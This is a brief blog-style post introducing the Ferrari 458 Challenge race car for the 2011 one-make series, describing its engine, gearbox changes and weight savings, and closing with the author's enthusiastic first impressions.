Lighter, faster and more track orientated: Meet Ferrari’s next generation one-make championship wonder.
To be used in the 2011 Ferrari Challenge Trofeo Pirelli the new berlinetta, will flank the F430 Challenge in the series. The 458 will be the fifth model used by Ferrari in its one- make championship which, next year, will be extended to include a new Asia- Pacific series.
The new 458 Challenge retains the wicked 4.5L V8 with 570hp with a redline of 9,000 rpm but does so with some new modifications. Gear ratio and calibration modifications have been made to the F1 box to ensure a higher torque output at lower revs. Most importantly though is weight reduction: body panels were reduced in thickness, while lightweight materials such as Lexan and carbon fiber replace the standard fare.
I wasn’t a fan of the car until I saw it in the flesh in Kuwait a couple of months ago and now seeing it with its race suit on, I think I like it even more! The GT2 brigade will be bracing themselves for the arrival of this bad boy…
